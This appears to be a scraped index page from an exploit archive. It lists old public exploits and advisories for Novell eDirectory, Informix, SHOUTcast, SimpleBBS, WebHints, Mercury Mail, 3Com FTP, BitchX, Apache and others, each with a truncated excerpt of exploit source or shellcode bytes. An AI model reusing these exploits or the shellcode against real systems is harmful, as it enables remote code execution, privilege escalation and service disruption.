Novell eDirectory <= 9.0 DHost Remote Buffer Overflow Exploit

No description provided by source. / . \ \ \ \ | | / | | | | \ / / /\ \ / \ | | \ / | |/ | |/ / \ / \ | / \ // | Y / ^ /\ | //\ \ /| / / || /\ | \ | \ / / / / 30\10\06 / || / / mm. dM8 YMMMb. dMM8 YMMMMb dMMM' YMMMb dMMMP There are doors I have yet to open YMMM MMM' windows I have yet...

Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (2)

Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow 2 // source: https://www.securityfocus.com/bid/20655/info The Novell eDirectory server iMonitor is prone to a stack-based buffer-overflow vulnerability because it fails to perform sufficient bounds checking on client-supplied data before...

Novell eDirectory/iMonitor HTTPSTK栈缓冲区溢出漏洞

Novell eDirectory是一个的跨平台的目录服务器。 Novell eDirectory在处理用户请求构造回应时存在输入验证漏洞，远程攻击者可能利用此漏洞在服务器上执行任意指令。 Novell的HTTP协议栈（httpstk）没有检查客户端所提供的HTTP Host请求头（如Host: www.host.com）的值。当服务器在准备HTTP重新定向响应调用snprintf时可能会触发这个漏洞，导致以加载httpstk库进程的权限执行任意指令。C++伪代码如下： define HTTPHDRHOSTFIELD 211 char szHttp = "HTTP"; char...

CVE-2006-3855

The ifxloadinternal function in IBM Informix Dynamic Server IDS allows remote authenticated users to execute arbitrary C code via the DllMain or init function in a library, aka "C code UDR."...

CVE-2006-3855

Affected product: IBM Informix Dynamic Server (IDS). Vulnerability: The ifx_load_internal function allows remote authenticated users to load an arbitrary library and execute code via DllMain (Windows) or _init (Linux) when the library is loaded, enabling arbitrary C code execution. This constitut...

csDoom <= 0.7 [Multiple Vulnerabilities] Denial of Service Exploit

Exploit for unknown platform in category dos / poc ================================================================== csDoom include include include ifdef WIN32 include / Header file used for manage errors in Windows It support socket and errno too this header replace the previous sockerrX.h /...

SHOUTcast &lt;= 1.9.4 File Request Format String Exploit (Leaked)

No description provided by source. / Shoutcast = 1.9.4 exploit by crash-x Trys to upload the shellcode to a fixed address and execute it. This exploit was not written bei Simon 'Zodiac' Moser segfault.ch. / include stdio.h include stdlib.h include stdarg.h include string.h include sys/types.h...

SimpleBBS &lt;= 1.1 Remote Commands Execution Exploit (c code)

No description provided by source. / SimpleBBS = v1.1 remote commands execution in c coded by: unitedasia v.Dec.7.2005 greetz: iloveyouma http://geography.about.com/library/maps/blrasia.htm http://www.lib.utexas.edu/maps/middleeastandasia/asiapol00.jpg $ gcc -o bbs bbs.c Usage ./bbs host /folder/...

phpBB &lt;= 2.0.15 Register Multiple Users Denial of Service (c code)

No description provided by source. / -------------------------------------------------------- Neo Security Team NST® - Advisory 15 - 00/00/06 -------------------------------------------------------- Program: phpBB 2.0.15 Homepage: http://www.phpbb.com Vulnerable Versions: phpBB 2.0.15 & Lower...

Webhints &lt;= 1.03 Remote Command Execution Exploit (c code) (2)

/ T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR : WebHints Remote C0mmand Execution Vuln Coded By: A l p h a P r o g r a m m e r Sirus-v E-Mail: [email protected] This Xpl Upload a Page in Vulnerable Directory , You can Change This Code For Yourself GR33tz T0 ==...

Aeon 0.2a Local Linux Exploit (c code)

Exploit for linux platform in category local exploits ====================================== Aeon 0.2a Local Linux Exploit c code ====================================== / first release /str0ke / / local linux exploit within aeon-0.2a Coded by patr0n security-tmp.h14.ru / define BUFLEN 533 define...

3Com Ftp Server 2.0 Remote Overflow Exploit

No description provided by source. / Email fixed brotha /str0ke / / 3Com Ftp Server remote overflow exploit author : c0d3r "kaveh razavi" [email protected] package : 3CDaemon version 2.0 revision 10 advisory : http://secway.org/advisory/ad20041011.txt company address : 3com.com it is just a...

Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow v2 (c code)

Exploit for unknown platform in category remote exploits ============================================================ Mercury Mail 4.01 Pegasus IMAP Buffer Overflow v2 c code ============================================================ / Remote Mercury32 Imap exploit 14 types of attacks WOW! By:...

Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit (c code)

Exploit for unknown platform in category remote exploits ================================================================= Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Exploit c code ================================================================= / whitehat.co.il comments removed do to muts...

Apache 2.0.52 Multiple Space Header DoS (c code)

Exploit for unknown platform in category dos / poc ================================================ Apache 2.0.52 Multiple Space Header DoS c code ================================================ /// Apache 2.0.52 and earlier DoS - Chintan Trivedi include "stdafx.h" include "winsock.h" include...

BitchX 1.0c19 Local Root Exploit (suid?)

Exploit for linux platform in category local exploits ======================================== BitchX 1.0c19 Local Root Exploit suid? ======================================== // BitchX local-root by Sha0 version 1.0c19 e inferiores -todas- // este exploit se lo dedico a mi chica. //...

BitchX 1.0c19 - Local Privilege Escalation

// BitchX local-root by Sha0 version 1.0c19 e inferiores -todas- // este exploit se lo dedico a mi chica. // 0xC0000000-4-strlenargv1-1-strlenbuffer // 2052 to the ret include include include include char payload69; char sha0code = "\xeb\x16\x5b\x31\xc0" "\x50\x53\xb0\x0b\x89"...

linux/x86 ipchains -F 49 bytes

No description provided by source. include stdio.h include string.h / asm" sub $0x4,%esp Con esto conseguimos que la shellcode nunca se popl %esp sobreescriba... gracias RaiSe : xorl %edx,%edx %edx a cero pushl %edx y ponemos los zeros del final del string en memoria pushw $0x462d tenemos -F0000...

Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)

No description provided by source. include include include include include include include include include define A 0x41 define PORT 80 struct sockaddrin hrm; int connchar ip int sockfd; hrm.sinfamily = AFINET; hrm.sinport = htonsPORT; hrm.sinaddr.saddr = inetaddrip; bzero&hrm.sinzero,8;...